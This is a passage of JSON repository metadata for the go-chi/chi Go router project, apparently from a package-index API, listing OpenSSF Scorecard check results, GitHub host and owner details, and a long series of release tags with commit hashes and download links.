defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GO-2025-3770 / GHSA-vrw8-fxc6-2r93"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 29 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T03:27:31.106Z","repository_id":37431049,"created_at":"2025-08-19T03:27:31.106Z","updated_at":"2025-08-19T03:27:31.106Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36403979,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-08T02:00:08.763Z","response_time":96,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"go-chi","name":"go-chi","uuid":"29575368","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/29575368?v=4","repositories_count":17,"last_synced_at":"2023-02-26T15:55:10.593Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/go-chi","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-10T02:33:16.133Z","updated_at":"2023-02-26T15:55:10.598Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi/repositories"},"tags":[{"name":"v5.3.1","sha":"8b258c7bb28f97a5f2a856ff7ef962578fec9215","kind":"commit","published_at":"2026-07-05T18:51:45.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"3b171578ca44dfd75ca3c5cbddc7b44c600a7b49","kind":"commit","published_at":"2026-05-22T15:16:13.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0/manifests"},{"name":"v5.2.5","sha":"05f1ef7bb50b8a8cb33a9dd3ba1c5b94bff0f723","kind":"commit","published_at":"2026-02-05T11:05:34.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5/manifests"},{"name":"v5.2.4","sha":"6eb35881c0e438ffb663ddbad3a61babaa5e5d8a","kind":"commit","published_at":"2026-01-14T16:02:00.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4/manifests"},{"name":"v5.2.3","sha":"9b9fb55def404397748a9fc7e044efe9db1d618e","kind":"commit","published_at":"2025-08-26T17:56:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3/manifests"},{"name":"v5.2.2","sha":"23c395f8524a30334126ca16fb4d37b88745b9b9","kind":"commit","published_at":"2025-06-20T12:21:10.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2/manifests"},{"name":"v5.2.1","sha":"71307f9b7e4e9527638bc951c42b782cd1560331","kind":"commit","published_at":"2025-01-20T20:41:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"0a20a0e3400e551803f463d17a0ab84ee8afef3c","kind":"commit","published_at":"2024-12-14T17:06:53.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"67be7d9cafdaeb4e04e887ff78d09e030ee43b00","kind":"commit","published_at":"2024-06-28T14:29:27.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0/manifests"},{"name":"v5.0.14","sha":"7957c0d4ddaee560a01110145dbf2809ffdb6663","kind":"commit","published_at":"2024-06-21T12:30:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.14","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14/manifests"},{"name":"v5.0.13","sha":"f10dc4a9cab53a47f600f518fcccaa044666e95f","kind":"commit","published_at":"2024-06-07T23:13:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.13","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13/manifests"},{"name":"v5.0.12","sha":"1191921289e82fdc56f298a76ff254742f568ece","kind":"commit","published_at":"2024-02-17T00:24:11.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.12","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12/manifests"},{"name":"v5.0.11","sha":"fcdb1329609a395afb1dac4c5f2bc777b35f0f17","kind":"commit","published_at":"2023-12-20T02:35:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.11","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11/manifests"},{"name":"v4.1.3","sha":"da7ce9468546b9c352b0c7eac3580961543d0d96","kind":"commit","published_at":"2023-09-07T09:47:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3/manifests"},{"name":"v3.3.5","sha":"8f7c7827792ffe0506ef6bf0d2e85d1ddfd89a20","kind":"commit","published_at":"2023-09-07T09:46:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5/manifests"},{"name":"v2.1.1","sha":"052d563ff595f7c360284be323a8ef4c41e1d761","kind":"commit","published_at":"2023-09-07T09:44:41.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1/manifests"},{"name":"v1.5.5","sha":"bbb989dcdf2943dd4cc8bc3381057cb632d1e73e","kind":"commit","published_at":"2023-09-07T09:35:12.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.5","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5/manifests"},{"name":"v5.0.10","sha":"99bc99e0bf0edc147e82765f2848167922a5c644","kind":"commit","published_at":"2023-07-13T16:01:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.10","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10/manifests"},{"name":"v5.0.9","sha":"cfd6c464dacfc6199e3f6155faf9cb3e57be0a95","kind":"commit","published_at":"2023-07-13T15:37:56.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.9","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9/manifests"},{"name":"v5.0.8","sha":"da69873df486639c64f3b1f90abf69c943c17554","kind":"commit","published_at":"2022-12-07T13:23:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.8","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8/manifests"},{"name":"v5.0.7","sha":"0316d5a1df8598eceb137f5f77945be56810b564","kind":"commit","published_at":"2021-11-18T21:56:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.7","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7/manifests"},{"name":"v5.0.6","sha":"66d6a4d9814d8d8a3816c730e18f5219f263412b","kind":"commit","published_at":"2021-11-15T21:30:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.6","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6/manifests"},{"name":"v5.0.5","sha":"b9a8b9d0a092f57ce4ca3896c40ea36e482c9b6c","kind":"commit","published_at":"2021-10-27T11:12:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5/manifests"},{"name":"v5.0.4","sha":"181551d0e5acd337ac7be6f4b7f71e9151c969dc","kind":"commit","published_at":"2021-08-29T14:34:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4/manifests"},{"name":"v5.0.3","sha":"f16f8704ccc32f63fbc20eb364c41050cf339860","kind":"commit","published_at":"2021-04-29T22:40:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"2283e4951adbd82c8f6427117bd6b2a1c315e725","kind":"commit","published_at":"2021-03-25T13:04:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"5086f887c59f4c582f871e1de651b6e62e51c377","kind":"commit","published_at":"2021-03-10T12:43:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"fe3708ee6c7bf30623c33ca1b8005182c392ff3f","kind":"commit","published_at":"2021-02-28T00:11:55.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0/manifests"},{"name":"v1.5.4","sha":"c9e87efe9691a63d6a89de8bbd16b04fe4d6640e","kind":"commit","published_at":"2021-02-27T20:52:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.4","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4/manifests"},{"name":"v1.5.3","sha":"7ea741287f73376032e7d4fee8fd6e371313bfa7","kind":"commit","published_at":"2021-02-21T20:28:20.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.3","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"e3bfca4f25703c66c9347e2a430dd88e3198b5f7","kind":"commit","published_at":"2021-02-10T19:44:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.2","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"f61ec8cf7c33c662ca78b6b2aac0e68f4729dfd6","kind":"commit","published_at":"2020-12-06T18:50:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.1","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"b6287654fc97544b16619d9c6284b0d90d6b2289","kind":"commit","published_at":"2020-11-12T22:54:47.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0/manifests"},{"name":"v4.1.2","sha":"86f9a6e7ce9bf453eaa339b51f88f586edbccbc1","kind":"commit","published_at":"2020-06-02T19:02:25.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"1fafc30c1d76663042337e150b02fbacdce3466c","kind":"commit","published_at":"2020-04-16T12:17:06.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"183768ed5df7d0b039500727c380bfbaf9229c81","kind":"commit","published_at":"2020-04-01T19:42:39.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0/manifests"},{"name":"v4.0.4","sha":"1f2d16707ca3418c2bd151747b5059387fa088ba","kind":"commit","published_at":"2020-03-24T15:11:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"2db61557f36b2f4caa20ce6ef50e98bac0f7fce5","kind":"commit","published_at":"2020-01-09T22:01:35.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"da24bba8dcd4021cafac38724bf10dccc97c3e36","kind":"commit","published_at":"2019-02-26T16:20:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"1a6bb108ccf279c8dac6f9bad857d773b4f9b421","kind":"commit","published_at":"2019-01-17T22:35:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"e95203758b2a6ec24a8e97124d5719ffe5ec1374","kind":"commit","published_at":"2019-01-10T15:56:14.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0/manifests"},{"name":"v3.3.4","sha":"08d9051ef6546d57c5dca8eae13e6df362e2d568","kind":"commit","published_at":"2019-01-08T01:17:51.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4/manifests"},{"name":"v3.3.3","sha":"b5294d10673813fac8558e7f47242bc9e61b4c25","kind":"commit","published_at":"2018-08-27T20:34:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1